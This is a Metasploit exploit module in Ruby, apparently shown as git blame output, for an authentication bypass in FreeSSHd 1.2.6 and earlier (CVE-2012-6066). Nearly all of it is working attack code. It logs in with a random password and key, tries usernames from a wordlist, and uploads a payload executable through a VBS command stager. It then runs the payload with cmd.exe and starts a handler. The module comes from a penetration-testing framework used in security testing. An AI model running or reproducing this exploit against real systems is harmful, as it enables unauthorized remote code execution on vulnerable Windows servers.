2013-01-16 08:14:52 +00:00
|
|
|
##
|
2014-10-17 16:47:33 +00:00
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
2013-10-15 18:50:46 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2013-01-16 08:14:52 +00:00
|
|
|
##
|
2013-01-13 16:08:04 +00:00
|
|
|
|
|
|
|
require 'msf/core'
|
2013-01-16 08:14:52 +00:00
|
|
|
|
2013-01-13 16:08:04 +00:00
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
2013-08-30 21:28:54 +00:00
|
|
|
Rank = ExcellentRanking
|
|
|
|
|
|
|
|
include Msf::Exploit::Remote::Tcp
|
|
|
|
include Msf::Exploit::EXE
|
|
|
|
|
|
|
|
def initialize(info={})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => "Freesshd Authentication Bypass",
|
|
|
|
'Description' => %q{
|
|
|
|
This module exploits a vulnerability found in FreeSSHd <= 1.2.6 to bypass
|
|
|
|
authentication. You just need the username (which defaults to root). The exploit
|
|
|
|
has been tested with both password and public key authentication.
|
|
|
|
},
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Author' =>
|
|
|
|
[
|
|
|
|
'Aris', # Vulnerability discovery and Exploit
|
|
|
|
'kcope', # 2012 Exploit
|
|
|
|
'Daniele Martini <cyrax[at]pkcrew.org>' # Metasploit module
|
|
|
|
],
|
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
[ 'CVE', '2012-6066' ],
|
|
|
|
[ 'OSVDB', '88006' ],
|
|
|
|
[ 'BID', '56785' ],
|
|
|
|
[ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2012-12/0012.html' ],
|
|
|
|
[ 'URL', 'http://seclists.org/fulldisclosure/2010/Aug/132' ]
|
|
|
|
],
|
|
|
|
'Platform' => 'win',
|
|
|
|
'Privileged' => true,
|
|
|
|
'DisclosureDate' => "Aug 11 2010",
|
|
|
|
'Targets' =>
|
|
|
|
[
|
|
|
|
[ 'Freesshd <= 1.2.6 / Windows (Universal)', {} ]
|
|
|
|
],
|
|
|
|
'DefaultTarget' => 0
|
|
|
|
))
|
|
|
|
|
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
Opt::RPORT(22),
|
|
|
|
OptString.new('USERNAME', [false, 'A specific username to try']),
|
|
|
|
OptPath.new(
|
|
|
|
'USER_FILE',
|
|
|
|
[ true, "File containing usernames, one per line",
|
|
|
|
# Defaults to unix_users.txt, because this is the closest one we can try
|
|
|
|
File.join(Msf::Config.data_directory, "wordlists", "unix_users.txt") ]
|
|
|
|
)
|
|
|
|
], self.class)
|
|
|
|
|
|
|
|
end
|
|
|
|
|
|
|
|
def load_netssh
|
|
|
|
begin
|
|
|
|
require 'net/ssh'
|
|
|
|
return true
|
|
|
|
rescue LoadError
|
|
|
|
return false
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
def check
|
|
|
|
connect
|
|
|
|
banner = sock.recv(30)
|
|
|
|
disconnect
|
|
|
|
if banner =~ /SSH\-2\.0\-WeOnlyDo/
|
|
|
|
version=banner.split(" ")[1]
|
2014-01-20 20:26:10 +00:00
|
|
|
return Exploit::CheckCode::Appears if version =~ /(2\.1\.3|2\.0\.6)/
|
|
|
|
return Exploit::CheckCode::Detected
|
2013-08-30 21:28:54 +00:00
|
|
|
end
|
|
|
|
return Exploit::CheckCode::Safe
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
def upload_payload(connection)
|
|
|
|
exe = generate_payload_exe
|
|
|
|
filename = rand_text_alpha(8) + ".exe"
|
|
|
|
cmdstager = Rex::Exploitation::CmdStagerVBS.new(exe)
|
|
|
|
opts = {
|
|
|
|
:linemax => 1700,
|
2013-09-26 19:34:48 +00:00
|
|
|
:decoder => File.join(Msf::Config.data_directory, "exploits", "cmdstager", "vbs_b64"),
|
2013-08-30 21:28:54 +00:00
|
|
|
}
|
|
|
|
|
|
|
|
cmds = cmdstager.generate(opts)
|
|
|
|
|
|
|
|
if (cmds.nil? or cmds.length < 1)
|
|
|
|
print_error("The command stager could not be generated")
|
|
|
|
raise ArgumentError
|
|
|
|
end
|
|
|
|
cmds.each { |cmd|
|
|
|
|
connection.exec!("cmd.exe /c "+cmd)
|
|
|
|
}
|
|
|
|
end
|
|
|
|
|
|
|
|
def setup_ssh_options
|
|
|
|
pass=rand_text_alpha(8)
|
|
|
|
options={
|
|
|
|
:password => pass,
|
|
|
|
:port => datastore['RPORT'],
|
|
|
|
:timeout => 1,
|
|
|
|
:proxies => datastore['Proxies'],
|
|
|
|
:key_data => OpenSSL::PKey::RSA.new(2048).to_pem
|
|
|
|
}
|
|
|
|
return options
|
|
|
|
end
|
|
|
|
|
|
|
|
def do_login(username,options)
|
|
|
|
print_status("Trying username '#{username}'")
|
|
|
|
options[:username]=username
|
|
|
|
|
|
|
|
transport = Net::SSH::Transport::Session.new(datastore['RHOST'], options)
|
|
|
|
auth = Net::SSH::Authentication::Session.new(transport, options)
|
|
|
|
auth.authenticate("ssh-connection", username, options[:password])
|
|
|
|
connection = Net::SSH::Connection::Session.new(transport, options)
|
|
|
|
begin
|
|
|
|
Timeout.timeout(10) do
|
|
|
|
connection.exec!('cmd.exe /c echo')
|
|
|
|
end
|
|
|
|
rescue RuntimeError
|
|
|
|
return nil
|
|
|
|
rescue Timeout::Error
|
|
|
|
print_status("Timeout")
|
|
|
|
return nil
|
|
|
|
end
|
|
|
|
return connection
|
|
|
|
end
|
|
|
|
|
|
|
|
#
|
|
|
|
# Cannot use the auth_brute mixin, because if we do, a payload handler won't start.
|
|
|
|
# So we have to write our own each_user here.
|
|
|
|
#
|
|
|
|
def each_user(&block)
|
|
|
|
user_list = []
|
|
|
|
if datastore['USERNAME'] and !datastore['USERNAME'].empty?
|
|
|
|
user_list << datastore['USERNAME']
|
|
|
|
else
|
|
|
|
f = File.open(datastore['USER_FILE'], 'rb')
|
|
|
|
buf = f.read
|
|
|
|
f.close
|
|
|
|
|
|
|
|
user_list = (user_list | buf.split).uniq
|
|
|
|
end
|
|
|
|
|
|
|
|
user_list.each do |user|
|
|
|
|
block.call(user)
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
def exploit
|
|
|
|
#
|
|
|
|
# Load net/ssh so we can talk the SSH protocol
|
|
|
|
#
|
|
|
|
has_netssh = load_netssh
|
|
|
|
if not has_netssh
|
|
|
|
print_error("You don't have net/ssh installed. Please run gem install net-ssh")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
|
|
|
|
options = setup_ssh_options
|
|
|
|
|
|
|
|
connection = nil
|
|
|
|
|
|
|
|
each_user do |username|
|
|
|
|
next if username.empty?
|
|
|
|
connection=do_login(username,options)
|
|
|
|
break if connection
|
|
|
|
end
|
|
|
|
|
|
|
|
if connection
|
|
|
|
print_status("Uploading payload, this may take several minutes...")
|
|
|
|
upload_payload(connection)
|
|
|
|
handler
|
|
|
|
end
|
|
|
|
end
|
2013-01-16 08:14:52 +00:00
|
|
|
|
2013-01-13 16:08:04 +00:00
|
|
|
end
|
|
|
|
|